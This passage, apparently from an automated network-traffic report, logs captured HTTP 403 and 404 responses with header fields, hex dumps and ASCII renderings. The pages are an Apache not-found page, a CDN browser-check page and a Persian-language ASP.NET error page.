        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 04 Oct 2024 10:08:58 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 79 36 69 7a 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /y6iz/ was not found on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 04 Oct 2024 10:09:01 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 79 36 69 7a 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /y6iz/ was not found on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 04 Oct 2024 10:09:03 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 79 36 69 7a 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /y6iz/ was not found on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 04 Oct 2024 10:09:06 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 79 36 69 7a 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /y6iz/ was not found on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: hcdnDate: Fri, 04 Oct 2024 09:59:55 GMTContent-Type: text/htmlContent-Length: 4792Connection: closeVary: Accept-EncodingCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originPermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTalt-svc: h3=":443"; ma=86400x-hcdn-request-id: 858c6aaf115336dd4d2eb4e067ddbddb-bos-edge1Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 68 65 63 6b 69 6e 67 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 62 65 66 6f 72 65 20 61 63 63 65 73 73 69 6e 67 2e 20 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 33 30 22 3e 3c 73 74 79 6c 65 3e 64 69 76 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 6c 6f 61 64 65 72 7b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 77 69 64 74 68 3a 35 30 70 78 3b 70 61 64 64 69 6e 67 3a 38 70 78 3b 61 73 70 65 63 74 2d 72 61 74 69 6f 3a 31 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 32 35 62 30 39 62 3b 2d 2d 5f 6d 3a 63 6f 6e 69 63 2d 67 72 61 64 69 65 6e 74 28 Data Ascii: <html><head><title>Checking your browser before accessing. Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta http-equiv="refresh" content="30"><style>div{text-align:center}.loader{margin:auto;width:50px;padding:8px;aspect-ratio:1;border-radius:50%;background:#25b09b;--_m:conic-gradient(
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: private,publicContent-Type: text/html; charset=utf-8Set-Cookie: ASP.NET_SessionId=jrsx5mkgfgpcnqwjecgalre1; path=/; HttpOnly; SameSite=LaxDate: Fri, 04 Oct 2024 10:00:38 GMTConnection: closeContent-Length: 1476Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 20 69 64 3d 22 48 65 61 64 31 22 3e 3c 74 69 74 6c 65 3e 0d 0a 09 d8 b5 d9 81 d8 ad d9 87 20 d9 85 d9 88 d8 b1 d8 af 20 d9 86 d8 b8 d8 b1 20 d8 b4 d9 85 d8 a7 20 d9 8a d8 a7 d9 81 d8 aa 20 d9 86 d8 b4 d8 af 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 d8 b5 d9 81 d8 ad d9 87 2c d9 85 d9 88 d8 b1 d8 af 2c d9 86 d8 b8 d8 b1 2c d8 b4 d9 85 d8 a7 2c d9 8a d8 a7 d9 81 d8 aa 2c d9 86 d8 b4 d8 af 2c 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 22 20 2f 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 55 73 65 72 73 2f 50 61 67 65 73 2f 37 31 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 3c 64 69 76 3e 3c 64 69 76 20 64 69 72 3d 22 6c 74 72 22 20 63 6c 61 73 73 3d 22 5f 37 31 5f 30 22 3e 26 6e 62 73 70 3b 3c 2f 64 69 76 3e 3c 68 31 20 64 69 72 3d 22 6c 74 72 22 20 63 6c 61 73 73 3d 22 5f 37 31 5f 30 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 5f 37 31 5f 32 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 5f 37 31 5f 33 22 3e 3c 73 74 72 6f 6e 67 3e 4f 6f 70 73 21 21 21 20 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 68 31 3e 3c 64 69 76 3e 26 6e 62 73 70 3b 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 37 31 5f 30 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 5f 37 31 5f 35 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 5f 37 31 5f 36 22 3e 26 6e 62 73 70 3b 20 d9 85 d8 aa d8 a7 d8 b3 d9 81 d8 a7 d9 86 d9 87 20 d8 b5 d9 81 d8 ad d9 87 e2 80 8c db 8c 20 d9 85 d9 88 d8 b1 d8 af 20 d9 86 d8 b8 d8 b1 20 d8 b4 d9 85 d8 a7 20 d8 af d8 b1 20 d8 a7 db 8c d9 86 20 d9 88 d8 a8 20 d8 b3 d8 a7 db 8c d8 aa 20 db 8c d8 a7 d9 81 d8 aa 20 d9 86 d8 b4 d8 af 2e 20 d9 85 d9 85 da a9 d9 86 20 d8 a7 d8 b3 d8 aa 20 d9 85 d8 b4 da a9 d9 84 20 d8 a8 d9 88 d8 ac d9 88 d8 af 20 d8 a2 d9 85 d8 af d9 87 20 d9 85 d8 b1 d8 a8 d9 88 d8 b7 20 d8 a8 d9 87 20 db 8c da a9 db 8c 20 d8 a7 d8 b2 20 d8 af d9 84 d8 a7 db 8c d9 84 20 d8 b2 db 8c d8 b1 20 d8 a8 d8 a7 d8 b4 d8 af 3c 62 72 20 2f 3e 3c 62 72 20 2f 3e d9 85 d9 85 da a9 d9 86 20 d8 a7 d8 b3 d8 aa 20 d9 85 d8 b3 db 8c d8 b1 20 d9 84 db 8c d9 86 da a9 db 8c 20 da a9 d9 87 20 d9 88 d8 a7 d8 b1 d8 af 20 d8 b4 d8 af d9 87 20 d8 a7 d8 b4 d8 aa d8 a8 d8 a7 d9 87 20 d8 a7 d8 b3 d8 aa 2e 20 db 8c da a9 d8 a8 d8 a7 d8 b1 20 d8 af db 8c da af d8 b1 20
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: private,publicContent-Type: text/html; charset=utf-8Set-Cookie: ASP.NET_SessionId=c2amcwrn3nza0amzggyfnv3v; path=/; HttpOnly; SameSite=LaxDate: Fri, 04 Oct 2024 10:00:40 GMTConnection: closeContent-Length: 1476Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 20 69 64 3d 22 48 65 61 64 31 22 3e 3c 74 69 74 6c 65 3e 0d 0a 09 d8 b5 d9 81 d8 ad d9 87 20 d9 85 d9 88 d8 b1 d8 af 20 d9 86 d8 b8 d8 b1 20 d8 b4 d9 85 d8 a7 20 d9 8a d8 a7 d9 81 d8 aa 20 d9 86 d8 b4 d8 af 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 d8 b5 d9 81 d8 ad d9 87 2c d9 85 d9 88 d8 b1 d8 af 2c d9 86 d8 b8 d8 b1 2c d8 b4 d9 85 d8 a7 2c d9 8a d8 a7 d9 81 d8 aa 2c d9 86 d8 b4 d8 af 2c 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 22 20 2f 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 55 73 65 72 73 2f 50 61 67 65 73 2f 37 31 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 3c 64 69 76 3e 3c 64 69 76 20 64 69 72 3d 22 6c 74 72 22 20 63 6c 61 73 73 3d 22 5f 37 31 5f 30 22 3e 26 6e 62 73 70 3b 3c 2f 64 69 76 3e 3c 68 31 20 64 69 72 3d 22 6c 74 72 22 20 63 6c 61 73 73 3d 22 5f 37 31 5f 30 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 5f 37 31 5f 32 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 5f 37 31 5f 33 22 3e 3c 73 74 72 6f 6e 67 3e 4f 6f 70 73 21 21 21 20 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 68 31 3e 3c 64 69 76 3e 26 6e 62 73 70 3b 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 37 31 5f 30 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 5f 37 31 5f 35 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 5f 37 31 5f 36 22 3e 26 6e 62 73 70 3b 20 d9 85 d8 aa d8 a7 d8 b3 d9 81 d8 a7 d9 86 d9 87 20 d8 b5 d9 81 d8 ad d9 87 e2 80 8c db 8c 20 d9 85 d9 88 d8 b1 d8 af 20 d9 86 d8 b8 d8 b1 20 d8 b4 d9 85 d8 a7 20 d8 af d8 b1 20 d8 a7 db 8c d9 86 20 d9 88 d8 a8 20 d8 b3 d8 a7 db 8c d8 aa 20 db 8c d8 a7 d9 81 d8 aa 20 d9 86 d8 b4 d8 af 2e 20 d9 85 d9 85 da a9 d9 86 20 d8 a7 d8 b3 d8 aa 20 d9 85 d8 b4 da a9 d9 84 20 d8 a8 d9 88 d8 ac d9 88 d8 af 20 d8 a2 d9 85 d8 af d9 87 20 d9 85 d8 b1 d8 a8 d9 88 d8 b7 20 d8 a8 d9 87 20 db 8c da a9 db 8c 20 d8 a7 d8 b2 20 d8 af d9 84 d8 a7 db 8c d9 84 20 d8 b2 db 8c d8 b1 20 d8 a8 d8 a7 d8 b4 d8 af 3c 62 72 20 2f 3e 3c 62 72 20 2f 3e d9 85 d9 85 da a9 d9 86 20 d8 a7 d8 b3 d8 aa 20 d9 85 d8 b3 db 8c d8 b1 20 d9 84 db 8c d9 86 da a9 db 8c 20 da a9 d9 87 20 d9 88 d8 a7 d8 b1 d8 af 20 d8 b4 d8 af d9 87 20 d8 a7 d8 b4 d8 aa d8 a8 d8 a7 d9 87 20 d8 a7 d8 b3 d8 aa 2e 20 db 8c da a9 d8 a8 d8 a7 d8 b1 20 d8 af db 8c da af d8 b1 20
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: private,publicContent-Type: text/html; charset=utf-8Set-Cookie: ASP.NET_SessionId=df3g3dyd3cnzyo4re1j1ozuc; path=/; HttpOnly; SameSite=LaxDate: Fri, 04 Oct 2024 10:00:43 GMTConnection: closeContent-Length: 1476Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 20 69 64 3d 22 48 65 61 64 31 22 3e 3c 74 69 74 6c 65 3e 0d 0a 09 d8 b5 d9 81 d8 ad d9 87 20 d9 85 d9 88 d8 b1 d8 af 20 d9 86 d8 b8 d8 b1 20 d8 b4 d9 85 d8 a7 20 d9 8a d8 a7 d9 81 d8 aa 20 d9 86 d8 b4 d8 af 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 d8 b5 d9 81 d8 ad d9 87 2c d9 85 d9 88 d8 b1 d8 af 2c d9 86 d8 b8 d8 b1 2c d8 b4 d9 85 d8 a7 2c d9 8a d8 a7 d9 81 d8 aa 2c d9 86 d8 b4 d8 af 2c 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 22 20 2f 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 55 73 65 72 73 2f 50 61 67 65 73 2f 37 31 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 3c 64 69 76 3e 3c 64 69 76 20 64 69 72 3d 22 6c 74 72 22 20 63 6c 61 73 73 3d 22 5f 37 31 5f 30 22 3e 26 6e 62 73 70 3b 3c 2f 64 69 76 3e 3c 68 31 20 64 69 72 3d 22 6c 74 72 22 20 63 6c 61 73 73 3d 22 5f 37 31 5f 30 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 5f 37 31 5f 32 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 5f 37 31 5f 33 22 3e 3c 73 74 72 6f 6e 67 3e 4f 6f 70 73 21 21 21 20 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 68 31 3e 3c 64 69 76 3e 26 6e 62 73 70 3b 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 37 31 5f 30 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 5f 37 31 5f 35 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 5f 37 31 5f 36 22 3e 26 6e 62 73 70 3b 20 d9 85 d8 aa d8 a7 d8 b3 d9 81 d8 a7 d9 86 d9 87 20 d8 b5 d9 81 d8 ad d9 87 e2 80 8c db 8c 20 d9 85 d9 88 d8 b1 d8 af 20 d9 86 d8 b8 d8 b1 20 d8 b4 d9 85 d8 a7 20 d8 af d8 b1 20 d8 a7 db 8c d9 86 20 d9 88 d8 a8 20 d8 b3 d8 a7 db 8c d8 aa 20 db 8c d8 a7 d9 81 d8 aa 20 d9 86 d8 b4 d8 af 2e 20 d9 85 d9 85 da a9 d9 86 20 d8 a7 d8 b3 d8 aa 20 d9 85 d8 b4 da a9 d9 84 20 d8 a8 d9 88 d8 ac d9 88 d8 af 20 d8 a2 d9 85 d8 af d9 87 20 d9 85 d8 b1 d8 a8 d9 88 d8 b7 20 d8 a8 d9 87 20 db 8c da a9 db 8c 20 d8 a7 d8 b2 20 d8 af d9 84 d8 a7 db 8c d9 84 20 d8 b2 db 8c d8 b1 20 d8 a8 d8 a7 d8 b4 d8 af 3c 62 72 20 2f 3e 3c 62 72 20 2f 3e d9 85 d9 85 da a9 d9 86 20 d8 a7 d8 b3 d8 aa 20 d9 85 d8 b3 db 8c d8 b1 20 d9 84 db 8c d9 86 da a9 db 8c 20 da a9 d9 87 20 d9 88 d8 a7 d8 b1 d8 af 20 d8 b4 d8 af d9 87 20 d8 a7 d8 b4 d8 aa d8 a8 d8 a7 d9 87 20 d8 a7 d8 b3 d8 aa 2e 20 db 8c da a9 d8 a8 d8 a7 d8 b1 20 d8 af db 8c da af d8 b1 20
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: private,publicContent-Type: text/html; charset=utf-8Set-Cookie: ASP.NET_SessionId=yjxzm0xtgg2mwcbx4vmy3tlz; path=/; HttpOnly; SameSite=LaxDate: Fri, 04 Oct 2024 10:00:46 GMTConnection: closeContent-Length: 1476Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 20 69 64 3d 22 48 65 61 64 31 22 3e 3c 74 69 74 6c 65 3e 0d 0a 09 d8 b5 d9 81 d8 ad d9 87 20 d9 85 d9 88 d8 b1 d8 af 20 d9 86 d8 b8 d8 b1 20 d8 b4 d9 85 d8 a7 20 d9 8a d8 a7 d9 81 d8 aa 20 d9 86 d8 b4 d8 af 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 d8 b5 d9 81 d8 ad d9 87 2c d9 85 d9 88 d8 b1 d8 af 2c d9 86 d8 b8 d8 b1 2c d8 b4 d9 85 d8 a7 2c d9 8a d8 a7 d9 81 d8 aa 2c d9 86 d8 b4 d8 af 2c 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 22 20 2f 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 55 73 65 72 73 2f 50 61 67 65 73 2f 37 31 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 3c 64 69 76 3e 3c 64 69 76 20 64 69 72 3d 22 6c 74 72 22 20 63 6c 61 73 73 3d 22 5f 37 31 5f 30 22 3e 26 6e 62 73 70 3b 3c 2f 64 69 76 3e 3c 68 31 20 64 69 72 3d 22 6c 74 72 22 20 63 6c 61 73 73 3d 22 5f 37 31 5f 30 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 5f 37 31 5f 32 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 5f 37 31 5f 33 22 3e 3c 73 74 72 6f 6e 67 3e 4f 6f 70 73 21 21 21 20 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 68 31 3e 3c 64 69 76 3e 26 6e 62 73 70 3b 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 37 31 5f 30 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 5f 37 31 5f 35 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 5f 37 31 5f 36 22 3e 26 6e 62 73 70 3b 20 d9 85 d8 aa d8 a7 d8 b3 d9 81 d8 a7 d9 86 d9 87 20 d8 b5 d9 81 d8 ad d9 87 e2 80 8c db 8c 20 d9 85 d9 88 d8 b1 d8 af 20 d9 86 d8 b8 d8 b1 20 d8 b4 d9 85 d8 a7 20 d8 af d8 b1 20 d8 a7 db 8c d9 86 20 d9 88 d8 a8 20 d8 b3 d8 a7 db 8c d8 aa 20 db 8c d8 a7 d9 81 d8 aa 20 d9 86 d8 b4 d8 af 2e 20 d9 85 d9 85 da a9 d9 86 20 d8 a7 d8 b3 d8 aa 20 d9 85 d8 b4 da a9 d9 84 20 d8 a8 d9 88 d8 ac d9 88 d8 af 20 d8 a2 d9 85 d8 af d9 87 20 d9 85 d8 b1 d8 a8 d9 88 d8 b7 20 d8 a8 d9 87 20 db 8c da a9 db 8c 20 d8 a7 d8 b2 20 d8 af d9 84 d8 a7 db 8c d9 84 20 d8 b2 db 8c d8 b1 20 d8 a8 d8 a7 d8 b4 d8 af 3c 62 72 20 2f 3e 3c 62 72 20 2f 3e d9 85 d9 85 da a9 d9 86 20 d8 a7 d8 b3 d8 aa 20 d9 85 d8 b3 db 8c d8 b1 20 d9 84 db 8c d9 86 da a9 db 8c 20 da a9 d9 87 20 d9 88 d8 a7 d8 b1 d8 af 20 d8 b4 d8 af d9 87 20 d8 a7 d8 b4 d8 aa d8 a8 d8 a7 d9 